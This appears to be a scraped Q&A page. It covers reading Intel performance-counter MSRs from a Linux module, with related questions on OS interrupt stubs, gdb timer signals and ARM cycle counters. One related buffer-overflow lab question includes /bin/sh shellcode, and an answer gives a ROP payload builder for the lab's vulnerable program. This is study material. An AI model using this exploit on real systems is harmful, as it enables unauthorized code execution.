I want to monitor the cache request number in the last level cache. I wrote a Linux module to get that information based on the tutorial here.
It can compile and run, but the output result is always 0. In other words, when I use rdmsr, it always give me edx=0, eax=0. I even tried the demo code in the tutorial, the output is still 0.
I'm stuck at this problem for a whole week. Could anyone help me point out the mistake I made in the program?
I knew there are some existing programs doing the same thing, but I have to know how to write the code by myself, because I want to monitor the cache request in Xen hypervisor. I cannot use those tools in Xen unless I incorporate the tools into Xen's hypervisor, which seems more work.
/*
* Record the cache miss rate of Intel Sandybridge cpu
* To confirm the event is correctly set!
*/
#include <linux/module.h> /* Needed by all modules */
#include <linux/kernel.h> /* Needed for KERN_INFO */
/*4 Performance Counters Selector for %ecx in insn wrmsr*/
#define PERFEVTSEL0 0x186
#define PERFEVTSEL1 0x187
#define PERFEVTSEL2 0x188
#define PERFEVTSEL3 0x189
/*4 MSR Performance Counter for the above selector*/
#define PMC0 0xc1
#define PMC1 0xc2
#define PMC2 0xc2
#define PMC3 0xc3
/*Intel Software Developer Manual Page 2549*/ /*L1I L1D cache events has not been confirmed!*/
/*L1 Instruction Cache Performance Tuning Events*/
#define L1I_ALLHIT_EVENT 0x80
#define L1I_ALLHIT_MASK 0x01
#define L1I_ALLMISS_EVENT 0x80 /*confirmed*/
#define L1I_ALLMISS_MASK 0x02 /*confirmed*/
/*L1 Data Cache Performance Tuning Events*/
/*Intel does not have the ALLREQ Miss mask; have to add LD_miss and ST_miss*/
#define L1D_ALLREQ_EVENT 0x43
#define L1D_ALLREQ_MASK 0x01
#define L1D_LDMISS_EVENT 0x40
#define L1D_LDMISS_MASK 0x01
#define L1D_STMISS_EVENT 0x28
#define L1D_STMISS_MASK 0x01
/*L2 private cache for each core*/ /*confirmed*/
#define L2_ALLREQ_EVENT 0x24
#define L2_ALLREQ_MASK L2_ALLCODEREQ_MASK /*0xFF*/
#define L2_ALLMISS_EVENT 0x24
#define L2_ALLMISS_MASK L2_ALLCODEMISS_MASK /*0xAA*/
#define L2_ALLCODEREQ_MASK 0x30
#define L2_ALLCODEMISS_MASK 0x20
/*L3 shared cache*/ /*confirmed*/
/*Use the last level cache event and mask*/
#define L3_ALLREQ_EVENT 0x2E
#define L3_ALLREQ_MASK 0x4F
#define L3_ALLMISS_EVENT 0x2E
#define L3_ALLMISS_MASK 0x41
#define USR_BIT (0x01UL << 16)
#define OS_BIT (0x01UL << 17)
#define SET_MSR_USR_BIT(eax) eax |= USR_BIT
#define CLEAR_MSR_USR_BIT(exa) eax &= (~USR_BIT)
#define SET_MSR_OS_BIT(eax) eax |= OS_BIT
#define CLEAR_MSR_OS_BIT(eax) eax &= (~OS_BIT)
#define SET_EVENT_MASK(eax, event, umask) eax |= (event | (umask << 8))
/*MSR EN flag: when set start the counter!*/
//#define MSR_ENFLAG (0x1<<22)
#define MSR_ENFLAG (0x1<<22)
/* 32bit insn v3*/
static inline void rtxen_write_msr(uint32_t eax, uint32_t ecx)
{
/*clear counter first*/
__asm__ __volatile__ ("movl %0, %%ecx\n\t"
"xorl %%edx, %%edx\n\t"
"xorl %%eax, %%eax\n\t"
"wrmsr\n\t"
: /* no outputs */
: "m" (ecx)
: "eax", "ecx", "edx" /* all clobbered */);
eax |= MSR_ENFLAG;
__asm__("movl %0, %%ecx\n\t" /* ecx contains the number of the MSR to set */
"xorl %%edx, %%edx\n\t"/* edx contains the high bits to set the MSR to */
"movl %1, %%eax\n\t" /* eax contains the log bits to set the MSR to */
"wrmsr\n\t"
: /* no outputs */
: "m" (ecx), "m" (eax)
: "eax", "ecx", "edx" /* clobbered */);
}
static inline void rtxen_read_msr(uint32_t* ecx, uint32_t *eax, uint32_t* edx)
{ __asm__ __volatile__(\
"rdmsr"\
:"=d" (*edx), "=a" (*eax)\
:"c"(*ecx)
);
}
static inline void delay(void )
{
char tmp[1000];
int i;
for( i = 0; i < 1000; i++ )
{
tmp[i] = i * 2;
}
}
enum cache_level
{
UOPS,
L1I,
L1D,
L2,
L3
};
int init_module(void)
{
enum cache_level op;
uint32_t eax, edx, ecx;
uint64_t l3_all;
op = UOPS;
switch(op)
{
case UOPS:
eax = 0x0001010E;
eax |= MSR_ENFLAG;
ecx = 0x187;
printk(KERN_INFO "UOPS Demo: write_msr: eax=%#010x, ecx=%#010x\n", eax, ecx);
rtxen_write_msr(eax, ecx);
ecx = 0xc2;
eax = 1;
edx = 2;
rtxen_read_msr(&ecx, &eax, &edx);
printk(KERN_INFO "UOPS Demo: read_msr: edx=%#010x, eax=%#010x\n", edx, eax);
break;
case L3:
eax = 0;
SET_MSR_USR_BIT(eax);
SET_MSR_OS_BIT(eax);
SET_EVENT_MASK(eax, L3_ALLREQ_EVENT, L3_ALLREQ_MASK);
eax |= MSR_ENFLAG;
ecx = PERFEVTSEL2;
printk(KERN_INFO "before wrmsr: eax=%#010x, ecx=%#010x\n", eax, ecx);
rtxen_write_msr(eax, ecx);
printk(KERN_INFO "after wrmsr: eax=%#010x, ecx=%#010x\n", eax, ecx);
printk(KERN_INFO "L3 all request set MSR PMC2\n");
printk(KERN_INFO "delay by access an array\n");
delay();
ecx = PMC2;
eax = 1;
edx = 2;
printk(KERN_INFO "rdmsr: ecx=%#010x\n", ecx);
rtxen_read_msr(&ecx, &eax, &edx); /*need to pass into address!*/
l3_all = ( ((uint64_t) edx << 32) | eax );
printk(KERN_INFO "rdmsr: L3 all request is %llu (%#010lx)\n", l3_all, (unsigned long)l3_all);
break;
default:
printk(KERN_INFO "operation not implemented yet\n");
}
/*
* A non 0 return means init_module failed; module can't be loaded.
*/
return 0;
}
void cleanup_module(void)
{
printk(KERN_INFO "Goodbye world 1.\n");
}
The result I have is:
[ 1780.946584] UOPS Demo: write_msr: eax=0x0001010e, ecx=0x00000187
[ 1780.946590] UOPS Demo: read_msr: edx=0x00000000, eax=0x00000000
[ 1818.595055] Goodbye world 1.
[ 1821.153947] UOPS Demo: write_msr: eax=0x0041010e, ecx=0x00000187
[ 1821.153950] UOPS Demo: read_msr: edx=0x00000000, eax=0x00000000
I finally solve it with the help of #Manuel Selva!
The correct flow of setting a perf. counter is:
Step 1: set msr and enable the counter by setting the EN bit in eax;
Step 2: stop the counter by writing to msr
Step 3: read the counter
I missed the step 2, that's why it always gives me 0. It makes sense to report 0 if I want to read the counter before stopping it.
The correct code of the switch statement is as follows:
switch(op)
{
case UOPS:
eax = 0x0051010E;
eax |= MSR_ENFLAG;
ecx = 0x187;
printk(KERN_INFO "UOPS Demo: write_msr: eax=%#010x, ecx=%#010x\n", eax, ecx);
rtxen_write_msr(eax, ecx);
//stop counting
eax = 0x0011010E;
rtxen_write_msr(eax,ecx);
ecx = 0xc2;
eax = 1;
edx = 2;
rtxen_read_msr(&ecx, &eax, &edx);
printk(KERN_INFO "UOPS Demo: read_msr: edx=%#010x, eax=%#010x\n", edx, eax);
break;
case L3:
eax = 0;
SET_MSR_USR_BIT(eax);
SET_MSR_OS_BIT(eax);
SET_EVENT_MASK(eax, L3_ALLREQ_EVENT, L3_ALLREQ_MASK);
eax |= MSR_ENFLAG;
eax |= (1<<20); //INT bit: counter overflow
ecx = PERFEVTSEL2;
printk(KERN_INFO "before wrmsr: eax=%#010x, ecx=%#010x\n", eax, ecx);
rtxen_write_msr(eax, ecx);
printk(KERN_INFO "after wrmsr: eax=%#010x, ecx=%#010x\n", eax, ecx);
printk(KERN_INFO "L3 all request set MSR PMC2\n");
printk(KERN_INFO "delay by access an array\n");
delay();
eax &= (~MSR_ENFLAG);
rtxen_write_msr(eax, ecx);
printk(KERN_INFO "stop the counter, eax=%#010x\n", eax);
ecx = PMC2;
eax = 1;
edx = 2;
printk(KERN_INFO "rdmsr: ecx=%#010x\n", ecx);
rtxen_read_msr(&ecx, &eax, &edx); /*need to pass into address!*/
l3_all = ( ((uint64_t) edx << 32) | eax );
printk(KERN_INFO "rdmsr: L3 all request is %llu (%#010lx)\n", l3_all, (unsigned long)l3_all);
break;
default:
printk(KERN_INFO "operation not implemented yet\n");
}
Related
I am trying to write my own operating system. Recently I wanted to turn my operating system into a 64 bit one (used to be 32 bit). But that screwed quite a bit, unfortunately. I set up the IDT and all but when an ISR or an IRQ is called the stack frame that is passed onto the handler is corrupt/wrong. By corrupt/wrong I mean for example the int_no is 0 for all cases, error code is always zero, all the registers are zero. I just get some garbage value in ss.
Here is the struct for the stack frame:
typedef struct {
uint64_t rdi, rsi, rbp, useless, rbx, rdx, rcx, rax;
uint64_t r8, r9, r10, r11, r12, r13, r14, r15;
uint64_t int_no, err_code;
uint64_t rip, cs, rflags, rsp, ss;
}__attribute__((packed)) interrupt_frame_t;
And here is my main IDT file:
#include "IDT.h"
#define PUSHALL \
".intel_syntax noprefix\n\t" \
"push r15\n\t"\
"push r14\n\t"\
"push r13\n\t"\
"push r12\n\t"\
"push r11\n\t"\
"push r10\n\t"\
"push r9\n\t"\
"push r8\n\t"\
"push rax\n\t"\
"push rcx\n\t"\
"push rdx\n\t"\
"push rbx\n\t"\
"push rsp\n\t"\
"push rbp\n\t"\
"push rsi\n\t"\
"push rdi\n\t"\
".att_syntax prefix\n\t" \
#define POPALL\
".intel_syntax noprefix\n\t" \
"pop rdi\n\t"\
"pop rsi\n\t"\
"pop rbp\n\t"\
"add rsp, 8\n\t"\
"pop rbx\n\t"\
"pop rdx\n\t"\
"pop rcx\n\t"\
"pop rax\n\t"\
"pop r8\n\t"\
"pop r9\n\t"\
"pop r10\n\t"\
"pop r11\n\t"\
"pop r12\n\t"\
"pop r13\n\t"\
"pop r14\n\t"\
"pop r15\n\t"\
"add rsp, 0x10\n\t"\
".att_syntax prefix\n\t" \
/* Common body for interrupt handler */
#define MAKE_INTERRUPT_COMMON_STUB(intno, intfunc) \
"push $"#intno"\n\t" \
PUSHALL \
"mov %rsp, %rdi\n\t"\
"sub $0x28, %rsp\n\t"\
"cld\n\t" \
"call " #intfunc "\n\t" \
"add $0x28, %rsp\n\t" /* Skip int_num and err_code */ \
POPALL \
"iretq \n\t"
#define MAKE_IRQ_COMMON_STUB(intno, intfunc) \
"push $"#intno"\n\t" \
PUSHALL \
"mov %rsp, %rdi\n\t"\
"cld\n\t" \
"call " #intfunc "\n\t" \
POPALL \
"iretq \n\t"
/* Make interrupt for exception without error code. Push a dummy value for the
* error code in it place. Push all the segment registers and the segment registers
* so that they are available to interrupt function (intfun). Pushes a unique
* interrupt number (intno) after the error code so that a handler can be multiplexed
* if needed. Restore all the registers upon exit.
*
* intentry: Is the interrupt entry point that can be used in an Interrupt
* Descriptor Table (IDT) entry.
* intfunc: Is the C interrupt function that the stub calls to do processing
* intno: Interrupt number. Can be used to multiplex multiple interrupts to one
* intfunc handler.
*/
#define MAKE_INTERRUPT(intentry, intfunc, intno) \
extern void intentry (void); \
__asm__(".global " #intentry "\n\t" \
".align 16\n\t" \
#intentry ":\n\t" \
"push $0\n\t" /* Push dummy error code */ \
MAKE_INTERRUPT_COMMON_STUB(intno, intfunc));
#define MAKE_IRQ(intentry, intfunc, intno) \
extern void intentry (void); \
__asm__(".global " #intentry "\n\t" \
".align 16\n\t" \
#intentry ":\n\t" \
"push $0\n\t" /* Push dummy error code */ \
MAKE_IRQ_COMMON_STUB(intno, intfunc));
/* Make interrupt for exception with error code. The processor pushes the error code
* after the return address automatically. Push all the segment registers and the
* segment registers so that they are available to interrupt function (intfun).
* Pushes a unique interrupt number (into) after the error code so that a handler
* can be multiplexed if needed. Restore all the registers upon exit.
*
* inventory: This is the interrupt entry point that can be used in an Interrupt
* Descriptor Table (IDT) entry.
* intfunc: Is the C interrupt function that the stub calls to do processing
* into: Interrupt number. Can be used to multiplex multiple interrupts to one
* intfunc handler.
*/
#define MAKE_INTERRUPT_ERRCODE(intentry, intfunc, intno) \
extern void intentry (void); \
__asm__(".global " #intentry "\n" \
".align 16\n\t" \
#intentry ":\n\t" \
MAKE_INTERRUPT_COMMON_STUB(intno, intfunc));
MAKE_INTERRUPT (isr0, isr0_handler, 0x00)
MAKE_INTERRUPT (isr1, isr1_handler, 0x01)
MAKE_INTERRUPT (isr2, isr2_handler, 0x02)
MAKE_INTERRUPT (isr3, isr3_handler, 0x03)
MAKE_INTERRUPT (isr4, isr4_handler, 0x04)
MAKE_INTERRUPT (isr5, isr5_handler, 0x05)
MAKE_INTERRUPT (isr6, isr6_handler, 0x06)
MAKE_INTERRUPT (isr7, isr7_handler, 0x07)
MAKE_INTERRUPT_ERRCODE(isr8, isr8_handler, 0x08)
MAKE_INTERRUPT (isr9, isr9_handler, 0x09)
MAKE_INTERRUPT_ERRCODE(isr10, isr10_handler, 0x0a)
MAKE_INTERRUPT_ERRCODE(isr11, isr11_handler, 0x0b)
MAKE_INTERRUPT_ERRCODE(isr12, isr12_handler, 0x0c)
MAKE_INTERRUPT_ERRCODE(isr13, isr13_handler, 0x0d)
MAKE_INTERRUPT_ERRCODE(isr14, isr14_handler, 0x0e)
/* Reserved 0x0f */
MAKE_INTERRUPT (isr16, isr0_handler, 0x10)
MAKE_INTERRUPT_ERRCODE(isr17, isr0_handler, 0x11)
MAKE_INTERRUPT (isr18, isr0_handler, 0x12)
MAKE_INTERRUPT (isr19, isr0_handler, 0x13)
MAKE_INTERRUPT (isr20, isr0_handler, 0x14)
/* Reserved 0x15 to 0x1d */
MAKE_INTERRUPT_ERRCODE(isr30, isr0_handler, 0x1e)
/* Reserved 0x1f */
/* IRQ handlers */
MAKE_IRQ (irq0, irq0_handler, 0x0)
MAKE_IRQ (irq1, irq1_handler, 0x1)
MAKE_IRQ (irq2, irq2_handler, 0x2)
MAKE_IRQ (irq3, irq3_handler, 0x3)
MAKE_IRQ (irq4, irq4_handler, 0x4)
MAKE_IRQ (irq5, irq5_handler, 0x5)
MAKE_IRQ (irq6, irq6_handler, 0x6)
MAKE_IRQ (irq7, irq7_handler, 0x7)
MAKE_IRQ (irq8, irq8_handler, 0x8)
MAKE_IRQ (irq9, irq9_handler, 0x9)
MAKE_IRQ (irq10, irq10_handler, 0xA)
MAKE_IRQ (irq11, irq11_handler, 0xB)
MAKE_IRQ (irq12, irq12_handler, 0xC)
MAKE_IRQ (irq13, irq13_handler, 0xD)
MAKE_IRQ (irq14, irq14_handler, 0xE)
MAKE_IRQ (irq15, irq15_handler, 0xF)
void init_idt_entry(int num, unsigned int offset, unsigned short select,
unsigned short flags)
{
_idt_entries[num].offset0 = (unsigned short)(offset & 0x000000000000FFFF);
_idt_entries[num].offset1 = (unsigned short)((offset & 0x00000000FFFF0000) >> 16);
_idt_entries[num].offset2 = (unsigned int)((offset & 0xFFFFFFFF00000000) >> 32);
_idt_entries[num].selector = select;
_idt_entries[num].flags = flags;
return;
}
///////////////////////////////////////
void idt_flush(struct idt *idtr)
{
asm volatile("lidt %0" :: "m"(*idtr));
}
#define PIC1_COMMAND 0x20
#define PIC1_DATA 0x21
#define PIC2_COMMAND 0xA0
#define PIC2_DATA 0xA1
#define PIC_EOI 0x20
#define ICW1_INIT 0x10
#define ICW1_ICW4 0x01
#define ICW4_8086 0x01
void init_pic()
{
/*
outb(0x20,0x11);
outb(0xA0,0x11);
outb(0x21, 0x20);
outb(0xA1, 40);
outb(0x21, 0x04);
outb(0xA1, 0x02);
outb(0x21, 0x01);
outb(0xA1, 0x01);
outb(0x21, 0x0);
outb(0xA1, 0x0);
*/
unsigned char a1, a2;
a1 = inb(PIC1_DATA);
io_wait();
a2 = inb(PIC2_DATA);
io_wait();
outb(PIC1_COMMAND, ICW1_INIT | ICW1_ICW4);
io_wait();
outb(PIC2_COMMAND, ICW1_INIT | ICW1_ICW4);
io_wait();
outb(PIC1_DATA, 0x20);
io_wait();
outb(PIC2_DATA, 0x28);
io_wait();
outb(PIC1_DATA, 4);
io_wait();
outb(PIC2_DATA, 2);
io_wait();
outb(PIC1_DATA, ICW4_8086);
io_wait();
outb(PIC2_DATA, ICW4_8086);
io_wait();
outb(PIC1_DATA, a1);
io_wait();
outb(PIC2_DATA, a2);
}
void init_idt()
{
_idt_entries = RequestPage();
Tidt.limit = 16 * 256;
Tidt.base = _idt_entries;
memset(_idt_entries, 0, 16*256);
for(int i = 0; i < 256 ; i++){
init_idt_entry(i,(int)&isr0,0x08, 0x8E);
}
init_idt_entry(0,(int)&isr0,0x08, 0x8E);
init_idt_entry(1,(int)&isr1,0x08, 0x8E);
init_idt_entry(2,(int)&isr2,0x08, 0x8E);
init_idt_entry(3,(int)&isr3,0x08, 0x8E);
init_idt_entry(4,(int)&isr4,0x08, 0x8E);
init_idt_entry(5,(int)&isr5,0x08, 0x8E);
init_idt_entry(6,(int)&isr6,0x08, 0x8E);
init_idt_entry(7,(int)&isr7,0x08, 0x8E);
init_idt_entry(8,(int)&isr8,0x08, 0x8E);
init_idt_entry(9,(int)&isr9,0x08, 0x8E);
init_idt_entry(10,(int)&isr10,0x08, 0x8E);
init_idt_entry(11,(int)&isr11,0x08, 0x8E);
init_idt_entry(12,(int)&isr12,0x08, 0x8E);
init_idt_entry(13,(int)&isr13,0x08, 0x8E);
init_idt_entry(14,(int)&isr14,0x08, 0x8E);
/* ISR15 is reserved */
init_idt_entry(16,(int)&isr16,0x08, 0x8E);
init_idt_entry(17,(int)&isr17,0x08, 0x8E);
init_idt_entry(18,(int)&isr18,0x08, 0x8E);
init_idt_entry(19,(int)&isr19,0x08, 0x8E);
init_idt_entry(20,(int)&isr20,0x08, 0x8E);
/* ISR21 to ISR2F are reserved */
init_idt_entry(30,(int)&isr30,0x08, 0x8E);
/* IRQ handlers */
init_idt_entry(32,(int)&irq0,0x08, 0x8E);
init_idt_entry(33,(int)&irq1,0x08, 0x8E);
init_idt_entry(34,(int)&irq2,0x08, 0x8E);
init_idt_entry(35,(int)&irq3,0x08, 0x8E);
init_idt_entry(36,(int)&irq4,0x08, 0x8E);
init_idt_entry(37,(int)&irq5,0x08, 0x8E);
init_idt_entry(38,(int)&irq6,0x08, 0x8E);
init_idt_entry(39,(int)&irq7,0x08, 0x8E);
init_idt_entry(40,(int)&irq8,0x08, 0x8E);
init_idt_entry(41,(int)&irq9,0x08, 0x8E);
init_idt_entry(42,(int)&irq10,0x08, 0x8E);
init_idt_entry(43,(int)&irq11,0x08, 0x8E);
init_idt_entry(44,(int)&irq12,0x08, 0x8E);
init_idt_entry(45,(int)&irq13,0x08, 0x8E);
init_idt_entry(46,(int)&irq14,0x08, 0x8E);
init_idt_entry(47,(int)&irq15,0x08, 0x8E);
init_pic();
SetPITSpeed(100);
drawStringToCursor("Set PIT speed\n",0xffffff, 0x000000);
idt_flush(&Tidt);
int s = initPS2Controller();
if(s == 0) drawStringToCursor("Successfully initialized PS2 Controller\n",0xffffff, 0x000000);
else drawStringToCursor("A problem occured while initializing PS2 Controller\n",0xffffff, 0x000000);
s = 0;
s = initKeyboard();
if(s == 0xFA) drawStringToCursor("Successfully initialized Keyboard Controller\n",0xffffff, 0x000000);
else drawStringToCursor("A problem occured while initializing Keyboard Controller\n",0xffffff, 0x000000);
s = 0;
s = initMouse();
if(s == 0) drawStringToCursor("Successfully initialized Mouse Controller\n",0xffffff, 0x000000);
else drawStringToCursor("A problem occured while initializing Mouse Controller\n",0xffffff, 0x000000);
outb(PIC1_DATA, 0);
outb(PIC2_DATA, 0);
//int d = 5 / 0;
asm volatile("sti;");
//while(1);
}
I think that there may be 3 problems: Something is wrong with the way I push them to the stack (which seems to me to most possible one), something wrong with the way I receive them or Something gets overwritten or lost in paging. Yet I couldn't spot the issue. I would be more than happy to post more code here, but here is the entire code if you want to check it out:
https://github.com/Danyy427/OSDEV.git
In this Lab, I have exploit.c, stack.c and call_shellcode.c. Stack.c has been modifed so it prints out the buffer address and ebp address. I am running this on Virtual Machine, ubuntu 12.04 32 bit.
I have to use the vulnerable program stack.c and put code in exploit.c in order to create a shell when running my stack executable. Any help is appreciated.
Stack.c is down below Sorry for bad indentation, actual code has proper indentation.
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
unsigned long int sp;
int cp(char *str)
{
// unsigned long int sp;
char buffer[12];
asm("movl %%ebp, %0" : "=r" (sp));
printf("$ebp is 0X%lx\n",sp);
strcpy(buffer, str);
printf("Buffer is at address %p\n",(void*)(&buffer));
return 1;
}
int main(int argc, char **argv)
{
char str[517];
FILE *badfile;
badfile = fopen("badfile", "r");
fread(str, sizeof(char), 517, badfile);
cp(str);
printf("Returned Properly\n");
return 1;
}
And exploit.c is down below.
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdq */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */
;
void main(int argc, char **argv)
{
char buffer[517];
FILE *badfile;
/* Initialize buffer with 0x90 (NOP instruction) */
memset(&buffer, 0x90, 517);
/* You need to fill the buffer with appropriate contents here */
/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer, 517, 1, badfile);
fclose(badfile);
}
I have ran gdb on my stack executable, compiled with gcc -o stack -z execstack -fno-stack-protector stack.c, and have found the buffer to be at address 0xbffff134 and ebp at 0xbffff148. I understand I have to somehow find my return address and make my payload be at that addresss? Some help regarding bufferoverflow with this assignment is needed please.
You need bypass ASLR, refer to the link below
https://sploitfun.wordpress.com/2015/05/08/bypassing-aslr-part-iii/
Find gadget:
pop ebx; ret; // construct ebx value
add al, 0x08; add dword [ebx+0x5D5B04C4], eax; ret; // construct eax value
add dword [ebx+0x0804A028], esp; call dword [0x08049F1C+eax*4]
construct eax and ebx value
write the ESP value to the 0804a020 memory, then execute it
Modified exploit.c:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdq */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */
;
int main(int argc, char **argv)
{
char buffer[517];
FILE *badfile;
int i;
unsigned int *val = (unsigned int*)buffer;
/* Initialize buffer with 0x90 (NOP instruction) */
memset(&buffer, 0x90, 517);
/* You need to fill the buffer with appropriate contents here */
val[6] = 0x08048378; /* pop ebx; ret; */
val[7] = 0xaaa9a03c; /* ebx */
for(i=8; i<16; i++)
val[i] = 0x0804847c; /* add al, 0x08; add dword [ebx+0x5D5B04C4], eax; ret; */
val[16] = 0x08048378; /* pop ebx; ret; */
val[17] = 0xfffffff8; /* ebx */
val[18] = 0x08048462; /* add dword [ebx+0x0804A028], esp; */
/* call dword [0x08049F1C+eax*4] */
memcpy(&val[19], shellcode, sizeof(shellcode));
/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer, 517, 1, badfile);
fclose(badfile);
return 0;
}
I am using gdb to debug a code that starts a timer. When the timer rings in gdb I always end up at instruction timer_settime+16.
Is this expected behavior?
As an example I slightly modified the code of timer_settime man page. The idea is to pass two arguments: a string of integers and a nsec value. The code launches the timer to ring after nsec, then copies the string.
I expected that by incrementing the nsec value, gdb stopped at different code lines, to end up inside the copy loop. However it always stops at .
So is this expected behavior?
Is it documented somewhere?
Is there a way to achieve what I expected (i.e.: launch a timer that when ring makes gdb stops where the program was just before (or after) the signal)? (always with nsec granularity).
Code:
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <signal.h>
#include <time.h>
#define CLOCKID CLOCK_REALTIME
#define SIG SIGUSR1
#define errExit(msg) do { perror(msg); exit(EXIT_FAILURE); \
} while (0)
unsigned char OUT[32];
unsigned char IN[32];
unsigned char ascii2hex(char in){
unsigned char out;
if( ('0' <= in) && (in <= '9') )
out = in - '0';
if( ('A' <= in) && (in <= 'F') )
out = in - 'A' + 10;
if( ('a' <= in) && (in <= 'f') )
out = in - 'a' + 10;
return out;
}
void asciiStr2hex(char * in, unsigned char * out, unsigned int len){
int i = 0;
int j = 0;
for( i = 0; i < len; i+=2){
out[j++] = (ascii2hex(in[i ]) << 4) + ascii2hex(in[i+1]);
}
}
void testcode(unsigned char *out, unsigned char *in, unsigned int len){
unsigned int i;
for (i=0;i<len;i++)
out[i] = in[i];
}
static void print_siginfo(siginfo_t *si)
{
timer_t *tidp;
int or;
tidp = si->si_value.sival_ptr;
printf(" sival_ptr = %p; ", si->si_value.sival_ptr);
printf(" *sival_ptr = 0x%lx\n", (long) *tidp);
or = timer_getoverrun(*tidp);
if (or == -1)
errExit("timer_getoverrun");
else
printf(" overrun count = %d\n", or);
}
static void handler(int sig, siginfo_t *si, void *uc)
{
/* Note: calling printf() from a signal handler is not
strictly correct, since printf() is not async-signal-safe;
see signal(7) */
printf("Caught signal %d\n", sig);
print_siginfo(si);
signal(sig, SIG_IGN);
}
int main(int argc, char *argv[])
{
timer_t timerid;
struct sigevent sev;
struct itimerspec its;
long long freq_nanosecs;
//sigset_t mask;
struct sigaction sa;
if (argc != 3) {
fprintf(stderr, "Usage: %s <16byte> <time-nanosecs>\n",
argv[0]);
exit(EXIT_FAILURE);
}
asciiStr2hex(argv[1], IN, 32);
/* Establish handler for timer signal */
printf("Establishing handler for signal %d\n", SIG);
sa.sa_flags = SA_SIGINFO;
sa.sa_sigaction = handler;
sigemptyset(&sa.sa_mask);
if (sigaction(SIG, &sa, NULL) == -1)
errExit("sigaction");
/* Block timer signal temporarily */
/* printf("Blocking signal %d\n", SIG);
sigemptyset(&mask);
sigaddset(&mask, SIG);
if (sigprocmask(SIG_SETMASK, &mask, NULL) == -1)
errExit("sigprocmask");
*/
/* Create the timer */
sev.sigev_notify = SIGEV_SIGNAL;
sev.sigev_signo = SIG;
sev.sigev_value.sival_ptr = &timerid;
if (timer_create(CLOCKID, &sev, &timerid) == -1)
errExit("timer_create");
printf("timer ID is 0x%lx\n", (long) timerid);
/* Start the timer */
freq_nanosecs = atoll(argv[2]);
its.it_value.tv_sec = freq_nanosecs / 1000000000;
its.it_value.tv_nsec = freq_nanosecs % 1000000000;
its.it_interval.tv_sec = its.it_value.tv_sec;
its.it_interval.tv_nsec = its.it_value.tv_nsec;
if (timer_settime(timerid, 0, &its, NULL) == -1)
errExit("timer_settime");
/* Sleep for a while; meanwhile, the timer may expire
multiple times */
printf("Sleeping for %d seconds\n", atoi(argv[1]));
testcode(OUT, IN, 16);
/* Unlock the timer signal, so that timer notification
can be delivered */
/* printf("Unblocking signal %d\n", SIG);
if (sigprocmask(SIG_UNBLOCK, &mask, NULL) == -1)
errExit("sigprocmask");
*/
exit(EXIT_SUCCESS);
}
When debug into gdb with r 00112233445566778899001122334455 2
I obtain:
Program received signal SIGUSR1, User defined signal 1.
0x76fc7c38 in timer_settime () from /lib/arm-linux-gnueabihf/librt.so.1
(gdb) x/30i $pc
=> 0x76fc7c38 <timer_settime+16>: cmn r0, #4096 ; 0x1000
0x76fc7c3c <timer_settime+20>: mov r4, r0
0x76fc7c40 <timer_settime+24>: bhi 0x76fc7c4c <timer_settime+36>
0x76fc7c44 <timer_settime+28>: mov r0, r4
0x76fc7c48 <timer_settime+32>: pop {r3, r4, r7, pc}
0x76fc7c4c <timer_settime+36>: bl 0x76fc55b4
0x76fc7c50 <timer_settime+40>: rsb r3, r4, #0
0x76fc7c54 <timer_settime+44>: mvn r4, #0
0x76fc7c58 <timer_settime+48>: str r3, [r0]
0x76fc7c5c <timer_settime+52>: b 0x76fc7c44 <timer_settime+28>
0x76fc7c60 <timer_settime+56>: andeq r0, r0, r2, lsl #2
0x76fc7c64: push {r4, r5, r6, r7, r8, r9, r10, lr}
0x76fc7c68: sub sp, sp, #600 ; 0x258
0x76fc7c6c: ldr r4, [pc, #340] ; 0x76fc7dc8
0x76fc7c70: add r1, sp, #512 ; 0x200
0x76fc7c74: add r4, pc, r4
0x76fc7c78: mov r0, r4
0x76fc7c7c: bl 0x76fc56b0
0x76fc7c80: cmp r0, #0
0x76fc7c84: bne 0x76fc7c98
0x76fc7c88: ldr r2, [sp, #512] ; 0x200
0x76fc7c8c: ldr r3, [pc, #312] ; 0x76fc7dcc
0x76fc7c90: cmp r2, r3
0x76fc7c94: beq 0x76fc7d94
0x76fc7c98: ldr r5, [pc, #304] ; 0x76fc7dd0
0x76fc7c9c: ldr r0, [pc, #304] ; 0x76fc7dd4
0x76fc7ca0: add r5, pc, r5
0x76fc7ca4: add r0, pc, r0
0x76fc7ca8: mov r1, r5
0x76fc7cac: bl 0x76fc5524
I am running such code on a raspberry pi, but I'am pretty sure I had the same behavior on another linux machine x86_64.
I have tested with "handle stop SIGUSR1".
I finally found that the problem was that I have to set unwindonsignal off in gdb to obtain the behavior I expected.
I was using following method to read clock in cortex-a15:
static void readticks(unsigned int *result)
{
struct timeval t;
unsigned int cc;
if (!enabled) {
// program the performance-counter control-register:
asm volatile("mcr p15, 0, %0, c9, c12, 0" :: "r"(17));
//enable all counters
asm volatile("mcr p15, 0, %0, c9, c12, 1" :: "r"(0x8000000f));
//Clear overflow.
asm volatile("mcr p15, 0, %0, c9, c12, 3" :: "r"(0x8000000f));
enabled = 1;
}
asm volatile("mrc p15, 0, %0, c9, c13, 0" : "=r"(cc));
gettimeofday(&t,(struct timezone *) 0);
result[0] = cc;
result[1] = t.tv_usec;
result[2] = t.tv_sec;
}
And final performance profilinglooks like:
before = readticks();
foo();
after = readticks();
clock_cycles = after - before.
I want to use same logic in cortex-A53, ARM64 (not aarch32).
I have tried this after following online portals:
